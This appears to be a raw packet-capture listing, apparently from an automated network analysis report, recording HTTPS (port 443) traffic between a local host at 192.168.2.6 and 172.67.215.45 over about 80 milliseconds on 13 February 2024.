                                                                  Feb 13, 2024 21:13:54.822855949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.822880983 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.822963953 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.822963953 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.822972059 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.823009014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.825007915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.825021029 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.825062037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.825077057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.825480938 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.825984001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.825999975 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.826040983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.826056004 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.826240063 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.844893932 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.844928026 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.845015049 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.845015049 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.845029116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.845185041 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.846121073 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.846136093 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.846196890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.846196890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.846204042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.846705914 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.847841024 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.847855091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.847908974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.847908974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.847918034 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.847958088 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.849446058 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.849467039 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.849498034 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.849518061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.849546909 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.849546909 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.850657940 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.850678921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.850728989 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.850728989 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.850735903 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.850822926 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.852900028 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.852912903 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.852969885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.852969885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.852977991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.853118896 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.853771925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.853790998 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.853907108 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.853914976 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.853959084 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.855463028 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.855478048 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.855541945 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.855541945 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.855550051 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.856273890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.857175112 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.857194901 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.857248068 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.857254982 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.857290983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.857290983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.858182907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.858198881 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.858262062 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.858262062 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.858269930 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.859354019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.859405041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.859419107 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.859479904 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.859479904 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.859487057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.860378981 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.861676931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.861697912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.861905098 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.861921072 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.862193108 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.862946987 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.862963915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.863233089 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.863240957 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.863440990 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.864141941 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.864161015 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.864218950 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.864234924 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.864386082 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867199898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867214918 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867283106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867283106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867290974 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867335081 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867355108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867372036 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867372036 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867378950 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867419958 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867419958 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867872000 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867886066 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867930889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867930889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.867937088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.867990971 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.868271112 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.868283987 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.868338108 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.868338108 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.868345022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.868444920 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.868506908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.868525982 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.868560076 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.868566990 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.868591070 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.868591070 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.869628906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.869648933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.869704008 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.869704008 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.869710922 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.869757891 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.869910002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.869924068 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.869972944 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.869972944 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.869980097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.870026112 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.870682955 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.870702982 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.870755911 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.870755911 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.870762110 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.871093035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.871696949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.871712923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.871763945 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.871763945 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.871769905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.871865034 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.872622013 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.872637033 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.872678995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.872695923 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.872697115 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.872704029 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.872754097 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.872754097 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.873406887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.873421907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.873461962 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.873467922 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.873498917 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.874316931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.874334097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.874392986 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.874392986 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.874401093 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.875228882 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.875241995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.875308990 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.875308990 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.875317097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.875325918 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.875349045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.875386000 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.875386000 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.875392914 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.875607014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.876199961 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.876214027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.876260996 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.876269102 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.876310110 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.877212048 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.877228975 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.877279997 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.877279997 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.877286911 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.878467083 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.878480911 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.878530025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.878530025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.878536940 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.879622936 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.879641056 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.879687071 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.879687071 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.879693985 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.879878044 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.879893064 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.879945993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.879945993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.879952908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.883239031 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.883258104 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.883307934 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.883321047 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.883332968 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.883744001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.883759022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.883788109 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.883793116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.883826971 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.884754896 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.884773970 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.884819031 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.884819031 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.884826899 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.884993076 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.885006905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.885051966 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.885051966 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.885059118 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.885845900 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.885865927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.885901928 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.885910988 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.885925055 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.886622906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.886637926 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.886676073 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.886682034 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.886708021 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.888181925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.888201952 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.888254881 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.888254881 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.888262033 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.888484001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.888499022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.888634920 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.888642073 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.889769077 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.889787912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.889820099 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.889826059 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.889903069 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.890742064 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.890755892 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.890810013 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.890815973 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.890845060 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.892455101 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.892473936 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.892535925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.892535925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.892544031 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.892707109 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.892723083 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.892780066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.892780066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.892786980 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.893414021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.893433094 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.893479109 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.893485069 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.893527031 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.895104885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.895122051 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.895158052 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.895164013 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.895251036 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.896465063 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.896483898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.896533012 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.896545887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.896652937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.896667004 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.896776915 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.897393942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.897411108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.897464991 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.897471905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.897486925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.897595882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.898825884 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.898849964 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.898886919 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.898897886 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.898916960 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.898937941 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.899678946 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.899714947 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.899755001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.899761915 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.899766922 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.899775982 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.899784088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.899806023 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.899832964 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.899837017 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.899874926 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.899874926 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.900814056 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.900826931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.900883913 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.900883913 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.900892019 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.900976896 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.901587009 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.901608944 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.901649952 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.901655912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.901673079 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.901731014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.902854919 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.902869940 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.902925014 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.902930975 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.902930975 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.902945042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.903006077 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.903014898 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.903048992 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.903093100 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.903093100 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.903947115 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.903959990 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.904017925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.904017925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.904025078 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.904072046 CET49701443192.168.2.6172.67.215.45
